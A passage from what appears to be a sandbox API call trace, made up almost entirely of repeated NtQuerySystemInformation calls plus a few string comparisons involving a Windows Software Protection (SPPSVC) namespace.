Length=0x20, ResultLength=0x0) [0282.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce40, Length=0x20, ResultLength=0x0) [0282.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce40, Length=0x20, ResultLength=0x0) [0282.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d040, Length=0x38, ResultLength=0x0) [0282.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cec0, Length=0x20, ResultLength=0x0) [0282.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce50, Length=0x20, ResultLength=0x0) [0282.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce50, Length=0x20, ResultLength=0x0) [0282.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d2d0, Length=0x50, ResultLength=0x0) [0282.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d250, Length=0x28, ResultLength=0x0) [0282.832] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0282.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d2d0, Length=0x50, ResultLength=0x0) [0282.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d2d0, Length=0x50, ResultLength=0x0) [0282.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d2d0, Length=0x50, ResultLength=0x0) [0282.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d200, Length=0x38, ResultLength=0x0) [0282.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d030, Length=0x28, ResultLength=0x0) [0282.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d030, Length=0x28, ResultLength=0x0) [0282.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d030, Length=0x28, ResultLength=0x0) [0282.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d0a0, Length=0x28, ResultLength=0x0) [0282.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d200, Length=0x38, ResultLength=0x0) [0282.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d120, Length=0x28, ResultLength=0x0) [0282.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d120, Length=0x28, ResultLength=0x0) [0282.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d200, Length=0x38, ResultLength=0x0) [0282.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d080, Length=0x20, ResultLength=0x0) [0282.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d000, Length=0x20, ResultLength=0x0) [0282.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d000, Length=0x20, ResultLength=0x0) [0282.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d000, Length=0x20, ResultLength=0x0) [0282.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d200, Length=0x38, ResultLength=0x0) [0282.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d080, Length=0x20, ResultLength=0x0) [0282.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d010, Length=0x20, ResultLength=0x0) [0282.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d010, Length=0x20, ResultLength=0x0) [0282.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d2d0, Length=0x50, ResultLength=0x0) [0282.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d250, Length=0x28, ResultLength=0x0) [0282.850] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0282.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d2d0, Length=0x50, ResultLength=0x0) [0282.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d2d0, Length=0x50, ResultLength=0x0) [0282.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d2d0, Length=0x50, ResultLength=0x0) [0282.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d200, Length=0x38, ResultLength=0x0) [0282.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d030, Length=0x28, ResultLength=0x0) [0282.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d030, Length=0x28, ResultLength=0x0) [0282.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d030, Length=0x28, ResultLength=0x0) [0282.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d0a0, Length=0x28, ResultLength=0x0) [0282.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d200, Length=0x38, ResultLength=0x0) [0282.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d120, Length=0x28, ResultLength=0x0) [0282.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d120, Length=0x28, ResultLength=0x0) [0282.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d200, Length=0x38, ResultLength=0x0) [0282.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d080, Length=0x20, ResultLength=0x0) [0282.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d000, Length=0x20, ResultLength=0x0) [0282.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d000, Length=0x20, ResultLength=0x0) [0282.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d000, Length=0x20, ResultLength=0x0) [0282.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d200, Length=0x38, ResultLength=0x0) [0282.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d080, Length=0x20, ResultLength=0x0) [0282.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d010, Length=0x20, ResultLength=0x0) [0282.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d010, Length=0x20, ResultLength=0x0) [0282.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccb0, Length=0x50, ResultLength=0x0) [0282.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccb0, Length=0x50, ResultLength=0x0) [0282.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccb0, Length=0x50, ResultLength=0x0) [0282.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cba0, Length=0x50, ResultLength=0x0) [0282.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cba0, Length=0x50, ResultLength=0x0) [0282.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cba0, Length=0x50, ResultLength=0x0) [0282.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cba0, Length=0x50, ResultLength=0x0) [0282.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cad0, Length=0x38, ResultLength=0x0) [0282.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c900, Length=0x28, ResultLength=0x0) [0282.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c900, Length=0x28, ResultLength=0x0) [0282.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c900, Length=0x28, ResultLength=0x0) [0282.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c900, Length=0x28, ResultLength=0x0) [0282.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c970, Length=0x28, ResultLength=0x0) [0282.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cad0, Length=0x38, ResultLength=0x0) [0282.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9f0, Length=0x28, ResultLength=0x0) [0282.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9f0, Length=0x28, ResultLength=0x0) [0282.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c890, Length=0x20, ResultLength=0x0) [0282.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c810, Length=0x20, ResultLength=0x0) [0282.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c810, Length=0x20, ResultLength=0x0) [0282.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c810, Length=0x20, ResultLength=0x0) [0282.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cad0, Length=0x38, ResultLength=0x0) [0282.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cad0, Length=0x38, ResultLength=0x0) [0282.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c950, Length=0x20, ResultLength=0x0) [0282.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c8e0, Length=0x20, ResultLength=0x0) [0282.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c8e0, Length=0x20, ResultLength=0x0) [0282.884] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.884] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.884] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.884] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.884] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.884] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.884] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccb0, Length=0x50, ResultLength=0x0) [0282.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccb0, Length=0x50, ResultLength=0x0) [0282.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccb0, Length=0x50, ResultLength=0x0) [0282.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cba0, Length=0x50, ResultLength=0x0) [0282.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cba0, Length=0x50, ResultLength=0x0) [0282.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cba0, Length=0x50, ResultLength=0x0) [0282.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.886] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cba0, Length=0x50, ResultLength=0x0) [0282.886] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.886] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cad0, Length=0x38, ResultLength=0x0) [0282.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c900, Length=0x28, ResultLength=0x0) [0282.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c900, Length=0x28, ResultLength=0x0) [0282.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c900, Length=0x28, ResultLength=0x0) [0282.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c900, Length=0x28, ResultLength=0x0) [0282.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c970, Length=0x28, ResultLength=0x0) [0282.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cad0, Length=0x38, ResultLength=0x0) [0282.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.890] NtQuerySystemInformation (SystemInformationClass=0xb9, 